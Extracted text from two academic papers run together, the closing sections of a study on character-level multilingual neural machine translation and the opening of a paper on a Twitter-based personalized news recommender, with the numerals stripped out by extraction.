bpe char . . . (t) multi char char . . . table : bleu scores of five different models on four language pairs. for each test or development set, the best performing model is shown in bold. (∗) results are taken from (firat et al., a). larger datasets such as czech and german corpora are trimmed such that every corpus contains, ap- proximately, an equal number of characters. quantitative analysis . evaluation with bleu score in this section, we first establish our main hypothe- ses for introducing character-level and multilingual models, and investigate whether our observations support or disagree with our hypotheses. from our empirical results, we want to verify: ( ) if fully character-level translation outperforms subword- level translation, ( ) in which setting and to what extent is multilingual translation beneficial and ( ) if multilingual, character-level translation achieves superior performance to other models. we outline our results with respect to each hypothesis below. ( ) character-level vs. subword-level in a bilin- gual setting, the char char model outperforms both subword-level baselines on de-en (table (a-c)) and cs-en (table (f-h)). on the other two language pairs, it exceeds the bpe bpe model and achieves a similar performance with the bpe char baseline (table (k-m) and (p-r)). we conclude that the proposed character-level model is comparable to or better than both subword-level baselines. meanwhile, in a multilingual setting, the character-level encoder significantly surpasses the subword-level encoder consistently in all the language pairs (table (d-e), (i-j), (n-o) and (s-t)). from this, we conclude that translating at the level of characters allows the model to discover shared constructs between languages more effectively. this also demonstrates that the character-level model is more flexible in assigning model capacity to different language pairs. ( ) multilingual vs. bilingual at the level of char- acters, we note that multilingual translation is indeed strongly beneficial. on the test sets, the multilin- gual character-level model outperforms the single- pair character-level model by . bleu in fi-en (table (m, o)) and . bleu in cs-en (ta- ble (h, j)), while achieving comparable results on de-en and ru-en. at the level of subwords, on the other hand, we do not observe the same degree of performance benefit. the multilingual bpe char model requires much more updates to reach the performance of the bilingual bpe char model (see figure ). this adequacy fluency setting src trg raw (%) stnd. (σ) raw (%) stnd. (σ) de-en (a) bi bpe char . - . . . (b) bi char char . . . . (c) multi char char . . . . cs-en (d) bi bpe char . . . - . (e) bi char char . - . . . (f) multi char char . . . . fi-en (g) bi bpe char . - . . - . (h) bi char char . - . . - . (i) multi char char . - . . . ru-en (j) bi bpe char . - . . - . (k) bi char char . . . . (l) multi char char . . . . table : human evaluation results for adequacy and fluency. we present both the averaged raw scores (raw) and the averaged standardized scores (stnd.). standardized adequacy is used to rank the systems and standardized fluency is used to break ties. a positive standardized score should be interpreted as the number of standard deviations above this particular worker’s mean score that this system scored on average. for each language pair, we boldface the best performing model with statistical significance. when there is a tie, we boldface both systems. suggests that learning useful subword segmentation across languages is difficult. ( ) multilingual char char vs. others the mul- tilingual char char model is the best performer in cs-en, fi-en and ru-en (table (j, o, t)), and is the runner-up in de-en (table (e)). the fact that the multilingual char char model outperforms the single-pair models goes to show the parameter efficiency of character-level translation: instead of training n separate models for n language pairs, it is possible to get a better performance with a single multilingual character-level model. . human evaluation it is well known that automatic evaluation met- rics such as bleu encourage reference-like transla- tions and do not fully capture true translation qual- ity (callison-burch, ; graham et al., ). therefore, we also carry out a recently proposed evaluation from graham et al. ( ) where we have human assessors rate both ( ) adequacy; and ( ) flu- ency of each system translation on a scale from to via amazon mechanical turk. adequacy is the degree to which assessors agree that the system translation expresses the meaning of the reference translation. fluency is evaluated using system trans- lation alone without any reference translation. approximately k turkers assessed a single test set ( k sentences in newstest- ) for each system and language pair. each turker conducted a mini- mum of assessments for quality control, and the set of scores generated by each turker was standard- ized to remove any bias in the individual’s scoring strategy. we consider three models (bilingual bpe char, bilingual char char and multilingual char char) for the human evaluation. we leave out the multilingual bpe char model to minimize the number of similar systems to improve the interpretability of the evalu- ation overall. for de-en, we observe that the multilingual char char and bilingual char char models are tied with respect to both adequacy and fluency (ta- ble (b-c)). for cs-en, the multilingual char char and bilingual bpe char models are tied for adequacy. however, the multilingual char char model yields significantly better fluency (table (d, f)). for fi- en and ru-en, the multilingual char char model is tied with the bilingual char char model with respect to adequacy, but significantly outperforms all other models in fluency (table (g-i, j-l)). overall, the improvement in translation quality yielded by the multilingual character-level model mainly comes from fluency. we conjecture that be- cause the english decoder of the multilingual model is tuned in on all the training sentence pairs, it (a) spelling mistakes de ori warum sollten wir nicht freunde sei ? de src warum solltne wir nich freunde sei ? en ref why should not we be friends ? bpe char why are we to be friends ? char char why should we not be friends ? (b) rare words de src siebentausendzweihundertvierundfünfzig . en ref seven thousand two hundred fifty four . bpe char fifty-five decline of the seventy . char char seven thousand hundred thousand fifties . (c) morphology de src die zufahrtsstraßen wurden gesperrt , wodurch sich laut cnn lange rückstaus bildeten . en ref the access roads were blocked off , which , according to cnn , caused long tailbacks . bpe char the access roads were locked , which , according to cnn , was long back . char char the access roads were blocked , which looked long backwards , according to cnn . (d) nonce words de src der test ist nun über , aber ich habe keine gute note . es ist wie eine verschlimmbesserung . en ref the test is now over , but i don’t have any good grade . it is like a worsened improvement . bpe char the test is now over , but i do not have a good note . char char the test is now , but i have no good note , it is like a worsening improvement . (e) multilingual multi src bei der metropolitnı́ho výboru pro dopravu für das gebiet der san francisco bay erklärten beamte , der kon- gress könne das problem банкротство доверительного Фонда строительства шоссейных дорог einfach durch erhöhung der kraftstoffsteuer lösen . en ref at the metropolitan transportation commission in the san francisco bay area , officials say congress could very simply deal with the bankrupt highway trust fund by raising gas taxes . bpe char during the metropolitan committee on transport for san francisco bay , officials declared that congress could solve the problem of bankruptcy by increasing the fuel tax bankrupt . char char at the metropolitan committee on transport for the territory of san francisco bay , officials explained that the congress could simply solve the problem of the bankruptcy of the road construction fund by increasing the fuel tax . table : sample translations. for each example, we show the source sentence as src, the human translation as ref, and the translations from the subword-level baseline and our character-level model as bpe char and char char, re- spectively. for (a), the original, uncorrupted source sentence is also shown (ori). the source sentence in (e) contains words in german (in green), czech (in yellow) and russian (in blue). the translations in (a-d) are from the bilingual models, whereas those in (e) are from the multilingual models. becomes a better language model than a bilingual model’s decoder. we leave it for future work to con- firm if this is indeed the case. qualitative analysis in table , we demonstrate our character-level model’s robustness in four translation scenarios from which conventional nmt systems are known to suffer. we also showcase our model’s ability to seamlessly handle intra-sentence code-switching, or mixed utterances from two or more languages. we compare sample translations from the character- level model with those from the subword-level model, which already sidesteps some of the issues associated with word-level translation. with real-world text containing typos and spelling mistakes, the quality of word-based translation would severely drop, as every non-canonical form of a word cannot be represented. on the other hand, a character-level model has a much better chance recovering the original word or sentence. indeed, our char char model is robust against a few spelling (f) long-distance dependencies de src der rückgang zusammen mit einem verstärkten sinken der anzahl der hausbesitzer unter jahren könnte dazu führen , dass gartenzentren zehntausende pfund pro jahr verlieren , wenn die heutigen jungen konsumenten nach einer studie der hta , wie in der financial times berichtet , die “ kernaltersgruppe für gartenprodukte ” erreichen . en ref the drop , coupled with a particular decline in the number of homeowners aged under , could result in garden centres losing out on tens of millions of pounds a year when today ’s young consumers reach the “ core gardening age group , ” according to the hta ’s study , which was reported by the financial times . bpe char the decline , together with reinforcing sinks of the number of householders under the age of , could lead to tens of thousands of garden centres losing tens of thousands of pounds a year if today ’s young consumers reach the “ kernel group of gardening products ” according to a study of the hta , as reported in the financial times . char char the decline , together with a reduction in the number of household owners under the age of , may lead to tens of thousands of pounds per year if today ’s young consumers report after a study of the hta , as reported in the financial times , the “ kernal age group for garden products ” . table : in this sample translation, the proposed character-to-character model fails to adequately capture a long-term dependency. mistakes (table (a)). given a long, rare word such as “sieben- tausendzweihundertvierundfünfzig” (seven thou- sand two hundred fifty four) in table (b), the subword-level model segments “siebentausend” as (sieb, ent, aus, end), which results in an inaccurate translation. the character-level model performs bet- ter on these long, concatenative words with ambigu- ous segmentation. we expect a character-level model to handle novel and unseen morphological inflections well. we ob- serve that this is indeed the case, as our char char model correctly understands “gesperrt”, a past par- ticiple form of “sperren” (to block) (table (c)). nonce words are terms coined for a single use. they are not actual words but are constructed in a way that humans can intuitively guess what they mean, such as workoliday and friyay. we construct a few de-en sentence pairs that contain german nonce words (one example shown in table (d)), and observe that the character-level model can in- deed detect salient character patterns and arrive at a correct translation. finally, we evaluate our multilingual models’ ca- pacity to perform intra-sentence code-switching, by giving them as input mixed sentences from multiple languages. the newstest- development datasets for de-en, cs-en and fi-en contain intersecting examples with the same english sentences. we com- pile a list of these sentences in de/cs/fi and their translation in en, and uniformly choose a few sam- ples at random from the english side. words or clauses from different languages are manually inter- mixed to create multilingual sentences. we discover that when given sentences with a high degree of language intermixing, as in ta- ble (e), the multilingual bpe char model fails to seamlessly handle alternation of languages. overall, however, both multilingual models generate reason- able translations. this is possible because we did not provide a language identifier when training our multilingual models. as a result, they learned to un- derstand a multilingual sentence and translate it into a coherent english sentence. there are indeed cases where the proposed character-level model fails, and we notice that those are often sentences with long-distance dependencies (see table ). we show supplementary, sample translations in each scenario on a webpage. training and decoding speed on a single titan x gpu, we observe that our char char models are ap- proximately % slower to train than our bpe char baselines when the same batch size was used. our bilingual character-level models can be trained in roughly two weeks. we further note that the bilingual bpe char model can translate , sentences in . minutes while the bilingual char char model requires . minutes (online, not in batch). see table for the exact details. further observations we also note that the mul- https://sites.google.com/site/dl mtc c model time to execute k updates (s) batch size time to decode k sentences (m) fi-en bpe char . . char char . . multi bpe char . . char char . . table : speed comparison. the second column shows the time taken to execute , training updates. the model makes each update after having seen one mini- batch. tilingual models are less prone to overfitting than the bilingual models. this is particularly visible for low-resource language pairs such as fi-en. figure shows the evolution of the fi-en validation bleu scores where the bilingual models overfit rapidly but the multilingual models seem to regularize learning by training simultaneously on other language pairs. figure : multilingual models overfit less than bilingual models on low-resource language pairs. conclusion we propose a fully character-level nmt model that accepts a sequence of characters in the source lan- guage and outputs a sequence of characters in the target language. what is remarkable about this model is the absence of explicitly hard-coded knowl- edge of words and their boundaries, and that the model learns these concepts from a translation task alone. our empirical results show that the fully character-level model performs as well as, or bet- ter than, subword-level translation models. the performance gain is distinctly pronounced in the multilingual many-to-one translation task, where re- sults show that the character-level model can assign model capacities to different languages more effi- ciently than the subword-level models. we observe a particularly large improvement in fi-en transla- tion when the model is trained to translate multiple languages, indicating a positive cross-lingual trans- fer to a low-resource language pair. we discover two main benefits of the multilin- gual character-level model: ( ) it is much more parameter-efficient than the bilingual models; and ( ) it can naturally handle intra-sentence code- switching as a result of the many-to-one transla- tion task. ultimately, we present a case for fully character-level translation: that translation at the level of character is strongly beneficial and should be encouraged more. the repository https://github.com/nyu-dl /dl mt-c c contains the source code and pre- trained models for reproducing the experimental re- sults. in the next stage of this research, we will in- vestigate extending our multilingual many-to-one translation models to perform many-to-many trans- lations, which will allow the decoder, similarly with the encoder, to learn from multiple target languages. furthermore, a more thorough investigation into model architectures and hyperparameters is needed. acknowledgements kyunghyun cho thanks the support of ebay, face- book, google (google faculty award, ) and nvidia (nvidia ai lab, - ). this work was partly supported by the samsung advanced in- stitute of technology (deep learning). jason lee was supported by the qualcomm innovation fellow- ship, and thanks david yenicelik and kevin walli- mann for their contribution in designing the qualita- tive analysis. the authors would like to also thank prof. zheng zhang (nyu, shanghai) for fruitful discussions and comments, as well as yvette gra- ham for her help with the human evaluation. finally, the authors thank the action editor and anonymous reviewers for their constructive feedback. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceedings of the international conference on learning represen- tations. chris callison-burch. . fast, cheap, and creative: evaluating translation quality using amazon’s mechan- ical turk. in proceedings of the conference on empirical methods in natural language processing, pages – . kyunghyun cho, bart van merriënboer, dzmitry bah- danau, and yoshua bengio. a. on the proper- ties of neural machine translation: encoder-decoder approaches. in proceedings of the th workshop on syntax, semantics, and structure in statistical trans- lation, pages – . kyunghyun cho, bart van merriënboer, caglar gulcehre, fethi bougares, holger schwenk, and yoshua ben- gio. b. learning phrase representations using rnn encoder-decoder for statistical machine transla- tion. in proceedings of the empiricial methods in nat- ural language processing, pages – . junyoung chung, kyunghyun cho, and yoshua bengio. . a character-level decoder without explicit seg- mentation for neural machine translation. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – . marta r. costa-jussá and josè a. r. fonollosa. . character-based neural machine translation. in pro- ceedings of the th annual meeting of the association for computational linguistics, pages – . ferdinand de saussure. . course in general lin- guistics. orhan firat, kyunghyun cho, and yoshua bengio. a. multi-way, multilingual neural machine trans- lation with a shared attention mechanism. in proceed- ings of the conference of the north american chapter of the association for computational linguis- tics, pages – . orhan firat, baskaran sankaran, yaser al-onaizan, fatos t. yarman vural, and kyunghyun cho. b. zero-resource translation with multi-lingual neural machine translation. in proceedings of the con- ference on empirical methods in natural language processing, pages – . dan gillick, cliff brunk, oriol vinyals, and amarnag subramanya. . multilingual language processing from bytes. in proceedings of the conference of the north american chapter of the association for computational linguistics, pages – . yvette graham, nitika mathur, and timothy baldwin. . accurate evaluation of segment-level machine translation metrics. in proceedings of the con- ference of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – . yvette graham, timothy baldwin, alistair moffat, and justin zobel. . can machine translation systems be evaluated by the crowd alone. natural language engineering, ( ): – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . ray s. jackendoff. . semantic structures, vol- ume . mit press. sébastien jean, kyunghyun cho, roland memisevic, and yoshua bengio. . on using very large target vo- cabulary for neural machine translation. in proceed- ings of the rd annual meeting of the association for computational linguistics, pages – . yoon kim, yacine jernite, david sontag, and alexan- der m. rush. . character-aware neural language models. in proceedings of the th aaai conference on artificial intelligence, pages – . diederik kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of the rd international conference for learning repre- sentations. wang ling, isabel trancoso, chris dyer, and alan w. black. . character-based neural machine transla- tion. arxiv preprint arxiv: . . minh-thang luong and christopher d. manning. . achieving open vocabulary neural machine translation with hybrid word-character models. in proceedings of the th annual meeting of the association for com- putational linguistics, pages – . minh-thang luong, hieu pham, and christopher d. manning. . effective approaches to attention- based neural machine translation. in proceedings of the th annual meeting of the association for com- putational linguistics, pages – . razvan pascanu, tomas mikolov, and yoshua bengio. . on the difficulty of training recurrent neural net- works. in proceedings of the th international con- ference on machine learning, pages – . rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. in proceedings of the th annual meeting of the association for computational linguis- tics, pages – . rico sennrich, barry haddow, and alexandra birch. . edinburgh neural machine translation systems for wmt . in proceedings of the st conference on machine translation. rupesh kumar srivastava, klaus greff, and jürgen schmidhuber. . training very deep networks. in advances in neural information processing systems, volume , pages – . ilya sutskever, oriol vinyals, and quoc v. le. . se- quence to sequence learning with neural networks. in advances in neural information processing systems, volume , pages – . yulia tsvetkov, sunayana sitaram, manaal faruqui, guillaume lample, patrick littell, david mortensen, alan w. black, lori levin, and chris dyer. . polyglot neural language models: a case study in cross-lingual phonetic representation learning. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics, pages – . yonghui wu, mike schuster, zhifeng chen, quoc v. le, mohammad norouzi, wolfgang macherey, maxim krikun, yuan cao, qin gao, klaus macherey, jeff klingner, apurva shah, melvin johnson, xiaobing liu, lukasz kaiser, stephan gouws, yoshikiyo kato, taku kudo, hideto kazawa, keith stevens, george kurian, nishant patil, wei wang, cliff young, jason smith, jason riesa, alex rudnick, oriol vinyals, greg corrado, macduff hughes, and jeffrey dean. . google’s neural machine translation system: bridg- ing the gap between human and machine translation. arxiv preprint arxiv: . . yijun xiao and kyunghyun cho. . efficient character-level document classification by combin- ing convolution and recurrent layers. arxiv preprint arxiv: . . xiang zhang, junbo zhao, and yann lecun. . character-level convolutional networks for text classi- fication. in advances in neural information process- ing systems, volume , pages – . incorporating popularity in a personalized news recommender system incorporating popularity in a personalized news recommender system nirmal jonnalagedda, susan gauch, kevin labille and sultan alfarhood computer science and computer engineering, university of arkansas, fayetteville, arkansas, united states abstract online news reading has become a widely popular way to read news articles from news sources around the globe. with the enormous amount of news articles available, users are easily overwhelmed by information of little interest to them. news recommender systems help users manage this flood by recommending articles based on user interests rather than presenting articles in order of their occurrence. we present our research on developing personalized news recommendation system with the help of a popular micro-blogging service, “twitter.” news articles are ranked based on the popularity of the article identified from twitter’s public timeline. in addition, users construct profiles based on their interests and news articles are also ranked based on their match to the user profile. by integrating these two approaches, we present a hybrid news recommendation model that recommends interesting news articles to the user based on their popularity as well as their relevance to the user profile. subjects agents and multi-agent systems, world wide web and web science keywords twitter, personalized news recommendation, news recommender systems, user profile introduction owing largely to the ever-increasing volume and sophistication of information on the web, we are able to access an enormous amount of data from around the globe. the downside of this information explosion is that users are often overwhelmed by information of little interest to them. the key challenge for the users is to find relevant information based on their interests. this problem has led to the evolution of recommender systems that help users find the information they need, based on their interests. recommender systems proactively present users with information related to their interests rather than requiring the user to search for, and then filter through, information based on explicit queries. many organizations use recommender systems to recommend various types of products to the user. for example, netflix recommends movies to its users based on the user’s movie ratings compared to other similar users’ ratings. amazon recommends various types of products such as gadgets, books, or movies and pandora radio recommends music based on a user’s past history and preferences. in addition, news recommender systems that recommend news articles from around the globe have become popular. there are many online news services such as google news and yahoo news. however, with plenty of news available, the driving problem is to identify and recommend the most interesting articles to each user so that they are not swamped by irrelevant how to cite this article jonnalagedda et al. ( ), incorporating popularity in a personalized news recommender system. peerj comput. sci. :e ; doi . /peerj-cs. submitted march accepted may published june corresponding author susan gauch, sgauch@uark.edu academic editor jason jung additional information and declarations can be found on page doi . /peerj-cs. copyright jonnalagedda et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:sgauch@uark.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ information. these articles should be related to each user interests but also include those news stories that are generating a lot of interest around the globe. news recommender systems are broadly classified into two types, content-based filtering and collaborative filtering. content-based filtering methods are based on the information and attributes of the product that is being recommended. this approach focuses on analyzing user’s past interest to make future recommendations. essentially, it recommends products whose contents are similar to the contents of previously viewed products that the user has rated highly. content-based filtering has some limitations. it can be difficult for the system to learn and understand user preferences from the user’s behavior. however, for some products, it is possible to extract features that have semantic meaning. a popular service that uses this approach is pandora radio that uses the properties of a song or artist in order to select a station that plays music with similar attributes. user feedback is used to refine the station’s results based on whether the user likes or dislikes the song. on the other hand, collaborative filtering is a method based on information about the actions of other users whose preferences are similar to the existing user. this method studies the pattern of other user’s behavior rather than extracting features from the product. the key advantage of this approach is that prior analysis and understanding of the existing data is not required to make recommendations to the user. however, these systems need a large amount of data from various users in order to make recommendations. amazon is a popular service that uses item to item (people who buy ‘x’ also buy ‘y’) collaborative filtering to recommend products based on other user purchases and reviews. other popular examples that use this approach are the social networking sites that recommend new friends, groups and other social connections to the user. in this paper, we develop a hybrid personalized news recommender system that recommends interesting news articles to the user using a micro-blogging service “twitter.” our news recommender system ranks the articles in different ways: ( ) we consider the user’s profile to recommend articles to the user; and ( ) we also consider the article’s popularity with the help of tweets from twitter’s public timeline. this paper presents a novel approach to help users find interesting articles to read by merging the above two methods of selecting articles. the next section reviews the relevant literature followed by a section explaining the design and implementation of the news recommender system. we continue with a section describing the evaluation of our system and a discussion and analysis of the results of the experiments conducted. we conclude with a summary of the research and briefly outline future work. literature review recommender systems recommender systems are widely used to help readers filter through an ever-growing flood of information. these systems implement an information filtering method to select products from a stream of information. also, recommender systems collect data from users explicitly or implicitly and, based on the collected information, create user profiles. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the user profiles are then used to generate recommendations. with explicit information collection, the user typically rates items in addition to his regular tasks. for example, in addition to purchasing an item, the user is asked to rate it with one or more stars. however, with implicit information collection, the recommender system monitors the user’s behavior with items during their normal activities. no extra user effort is required. however, the system must infer the user’s preferences from their actions. recommender systems have been considered as a remedy to overcome the information explosion problem and a lot of research effort has been focused on developing highly reliable recommendation techniques. traditional recommender systems are classified based on what information they use and on how they use that information (tuzhilin & adomavicius, ). recommender systems are classified into three categories, based on how the recommendations are made (balabanovic & shoham, ). . content-based recommender systems: these recommender systems recommend an item to the user similar to the ones the user preferred in the past. . collaborative recommender systems: these systems recommend an item to the user based on the people with similar tastes and preferences have liked in the past. they have the advantage that they can recommend items for which little or no semantic information is available (music, movies, books). . hybrid recommender systems: these systems combine both the collaborative and content-based recommendation techniques in order to improve the accuracy of the recommendation. the information gathered from either content-based or collaborative filtering approaches can be used for either memory-based or model-based algorithms. memory- based systems calculate recommendations on-the-go based on the previous user behavior. on the other hand, model-based systems are developed using data mining and machine learning algorithms to find patterns based on training data (su & khoshgoftaar, ). these systems incorporate algorithms such as bayesian networks, clustering models, and semantic models to make predictions for real data from the training model to make recommendations. memory-based systems are easy to implement, work well in real-time, and new data can be added easily and incrementally. however, this technique can become computationally expensive and the performance is affected when data is either sparse or dense. also, these systems are dependent on human ratings and have limited scalability for large datasets. model-based systems better address the scarcity, scalability, and other problems faced by memory-based systems. these systems not only improve the prediction performance but also give and intuitive rationale for recommendations. model-based systems have a more holistic goal to uncover latent factors that explain observed ratings (koren, ). however, the downsides of the model-based systems are expensive model building and loss of useful information caused by dimensionality reduction techniques. some applications implement a hybrid model that fuses both these models to overcome the limitations such as scarcity and loss of information. the goal of these hybrid systems is to jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ improve the prediction performance and to overcome the limitations faced by the model- based and memory-based approaches. however, these systems have increased complexity and are expensive to implement (das et al., ). content-based recommender systems content-based recommender systems are based on information about and attributes of the items that are going to be recommended. in other words, these systems recommend items that are similar to those items in which the user has shown interest in the past. the items are recommended based on the comparison between the item contents and user interests. these recommender systems are used in various domains such as web sites, web blogs, restaurants, news articles etc. the user profile is built based on his interests and this profile indicates the type of items that the user likes. several techniques have been implemented to identify the items matching the user profile to make recommendations. most traditional content-based recommender systems depend on features extracted from the content of the items themselves. the features associated with the items are then matched with the user’s profile to make recommendations. this approach is most commonly used by applications whose items have sufficient associated text from which keywords can be extracted. recommendations are done based on the similarity of keywords associated with the items and the keywords associated with the user profile. the user profile’s keywords can be manually supplied (explicit) or identified by mining keywords from items viewed, liked, or purchased by the user (implicit). content-based recommenders primarily use a weighting mechanism to rank the items by assigning weights to the keywords and to differentiate between the items. the keywords are extracted from the contents of the items that the user has shown interest in the past. these keywords form the basis for the user profile. if a user likes an item, the weights of the terms extracted from the item’s content are updated to the weights of the corresponding terms in the user profile. the items recommended in the future are primarily based on the user profile. there are several methods to calculate the weights of the keywords in the content. the most commonly used method is the term frequency - inverse document frequency (tf-idf) method. examples of the earliest traditional content-based recommender systems include (lang, ; krulwich & burkey, ; pazzani, muramatsu & billsus, ). lang ( ) implemented a netnews filtering system, “newsweeder,” that addresses the user profile building problem by letting the user enter his or her interest level for each article being read. the goal of an information filtering system is to sort through large volumes of information and present to the user those documents that are likely to satisfy his or her information requirement. lang ( ) used two approaches tf-idf and minimum description length (mdl) for term weights. two metrics were used to evaluate the performance. one metric was precision that calculated the ratio of relevant documents retrieved to all documents retrieved. the other was the confusion matrix of error generated by text in which the column of the matrix represents the instances in a predicted class, while each row represents the instances in an actual class. he found that mdl approach outperformed the traditional tf-idf approach. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ krulwich & burkey ( ) and pazzani, muramatsu & billsus ( ) conducted similar work by developing intelligent information agents in their information finder system that recommended information such as news, bulletin boards, databases, etc., and syskill & webert that recommended movies, respectively. these intelligent agents incorporate traditional content-based filtering approaches to make recommendations. these agents recommend items that match the contents of the user profiles. the user profile is built based on the user’s interest and preferences in the past through explicit rankings, and this profile forms the basis for these agents to find items that are interesting to the user. mooney and roy ( ) developed a next-generation content-based recommender system that utilizes information extraction and a machine-learning algorithm for text categorization. their prototype system, learning intelligent book recommending agent (libra), uses a database of book information extracted from web pages at amazon.com. they performed a subject search on the amazon website to obtain a list of book- description urls that are published on subjects of broad interests. libra then downloads each of these pages and uses a simple pattern-based information-extraction system to extract all the information pertaining to the book such as author, title, publications, related authors, etc. preprocessing is performed on the information gathered for the removal of stop-words and formatting to obtain unique tokens. the content associated with the synopses, published reviews and customer comments were clustered into a single attribute called description. the system was trained by querying on specific authors and titles to retrieve relevant books. the books retrieved were presented to the users who were asked to rate their interest in the book. these user-book ratings form the explicit input on which to build the user profile. the system then learns a profile of the user using a bayesian learning algorithm and produces a ranked list of the most recommended additional titles from the system’s catalog. next, the classifier was used to predict the user rankings for the remaining books. finally, the top-scoring books were recommended to the user. also, the system adapts to the changing interests of the user and produces new recommendations based on the information collected from the user. libra was evaluated on several data sets. experiments were conducted on the book recommendations and two different users rated the books. the performance of the system was analyzed using a -fold validation experiment for varying number of training documents. the results indicated that the top recommendations by libra were found interesting to the users when compared to randomly selected documents. the results also implied that performance was still high despite considering very few training examples. in more recent work, kang, doornenbal & schijvenaars ( ) introduced the elsevier journal finder. the proposed service is a content-based recommender system that recommends elsevier journals that have published papers related to the one an author is willing to submit. it covers all major scientific domains available in the elsevier database and about , per-reviewed journals. the system typically uses natural language processing (nlp) techniques to generate noun phrases features from papers which will then be used to do the matching. they are extracted using pattern of part-of-speech tag sequences and are represented using the backus-naur-form. after being extracted, the jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ noun phrases are mined and normalized by the elsevier fingerprint engine (efe) which consist of several nlp techniques used to generate relevant annotations (sentence boundaries, tokens, part-of-speech tag, phrase chunking : : : ). the well-known okapi bm algorithm is used to do the matching between the submitted query and the papers in the database, but instead of using bag-of-words as input they use the previously generated noun phrase annotations. as an output, they produce a list of ranked paper along with their respective bm score. finally, they compute an average bm score for each journal by averaging the score of all papers published in this journal. tkalcic et al. ( ) introduce a content-based recommender system for images that uses affective labeling of multimedia content. the system uses emotion detection techniques and a k-nearest neighbor machine learning algorithm to create affective labels. collaborative recommender systems collaborative recommender systems are the best-known and most widely used recommenders. examples of organizations that use collaborative recommender systems are amazon, youtube, and reddit. a profile is created for each user (item) according to the similarity of other users (item) in the system. according to the profiles, collaborative filtering recommender systems recommend items to target users according to the preferences of their similar users. there are two major types of algorithms for collaborative filtering: user-based and the item-based. user-based algorithms find out the most similar neighbor users to a target user based on the similarity of ratings. the products having the highest ratings from the neighbors are recommended to the target user (mcnee et al., ). essentially, if the target user and the neighbor both like some items in common, then the target user is likely to like other items that their neighbor has liked that the target user has not yet purchased and/or rated. for item-based algorithms, when a user is interested in an item, similar items are also recommended to the user (yu & zhang, ; sarwar et al., ). item similarity is based on items that are commonly purchased/liked together. if, in the past, people who like star wars also like lord of the rings, then a new user who has watched star wars should have lord of the rings recommended to them. traditional collaborative recommender systems incorporate similar steps in order to make recommendations to the user. first, the user-item rating information is collected. each user is provided with a collection of items for him to rate according to his interests. each user is thus represented by item-rating pairs, which contains the ratings provided by the user to several items. next, vectors are created that represent users or items and a similarity measure is chosen. there are several possible measures to calculate the similarity between two vectors. pearson correlation, cosine vector similarity, mean-squared difference and spearman correlation are some of the most commonly used metrics to measure the similarity between pairs of vectors. the next task is to identify the neighboring users who will serve as recommenders. there are two general techniques, threshold-based and top-n. with the threshold-based selection, vectors whose similarity exceeds a certain threshold value are considered as neighbors of the target user. in contrast, with the top-n technique, the n-closest neighbors jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ are selected for a given value of n. finally, predictions are produced by calculating the weighted average of the neighbors’ ratings, weighted by their similarity to the target user. examples of the earliest traditional collaborative recommender systems include grouplens (resnick et al., ) and bellcore’s video recommendation system (hill et al., ) that recommended news articles and videos to, respectively. although successful first approaches, these traditional collaborative recommender systems often faced challenges such as scarcity, scalability, and cold-start. sparse data can be a problem because if you have a few thousand users but several million items, there may not be any users who have purchased the same items as a target user. scalability is an issue because there may be millions of items and/or users and millions of transactions a day. running machine-learning algorithms may be intractable, leading to a need to reduce features and/ or entities in the algorithm. the cold-start problem is one of the most difficult to deal with. when the first users interact with a new recommender system, there are no previous user preferences to exploit in order to generate any recommendations at all. to overcome the above-mentioned problems, gong ( ) developed a collaborative recommender system based on user clustering and item clustering. users are clustered based on their ratings on several items and each user’s cluster is associated with a cluster center. based on the similarity between a target user and the cluster centroids, the nearest neighbors of target user can be found to make recommendations and predictions where necessary. by clustering users and items, data can be aggregated across users or items, alleviating the sparse data problem and leading to greater accuracy. by comparing users to clusters rather than all other users, this approach is more scalable than the traditional collaborative recommendation. the approach proposed by gong ( ) is explained in detail below. first, users are clustered into groups using the k-means algorithm. the data sparsity problem faced by other collaborative recommender systems is overcome by the explicit use of the item clusters as prediction mechanisms. based on the results of item clustering, predictive strategies are applied to supply missing data. next, item clustering is implemented to identify the items with similar user ratings. the items are clustered in a manner similar to the user clustering technique. next, the cluster centers and the neighbors are identified. from the information gathered, the weighted average of the neighbors’ ratings is calculated, weighted by their similarity to the target item to produce recommendations to the users. gong ( ) created a dataset containing , ratings from , users on , movies with every user providing at least ratings. the ratings were on a numeric five- point scale with and representing negative ratings, and representing positive ratings, and indicating ambivalence. several metrics such as the mean absolute error, root mean square error and correlations between ratings and predictions are used for the purpose of evaluation and to deduce conclusions. the results indicated that his algorithm outperformed traditional collaborative recommendation algorithms. recently, li et al. ( ) present rank-geofm, a point of interest (poi) recommender system that uses both context-aware and collaborative filtering techniques. their approach differs from the traditional ones because they obtain geographical factorization jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ in a ranking based way. moreover, by incorporating different types of context information and by using a stochastic gradient descent-based algorithm, they are able to address the data scarcity problem common to this type of recommender system. news recommender systems news recommender systems are widely used and are a promising research direction. with so many information sources, the internet provides fast access to the millions of news articles around the globe. however, users need recommendations to help them find the most interesting articles from this flood of information. news recommender systems can be broadly classified into two types based on the type of recommendations made to the user. some recommender systems take advantage of online social networking sites to provide interesting news articles to the user. such recommendations are called popularity-based news recommendations since the articles are ranked based on their popularity identified from the social networking websites. other recommender systems recommend interesting news articles to the user solely based on the user’s interests. such recommendations are called 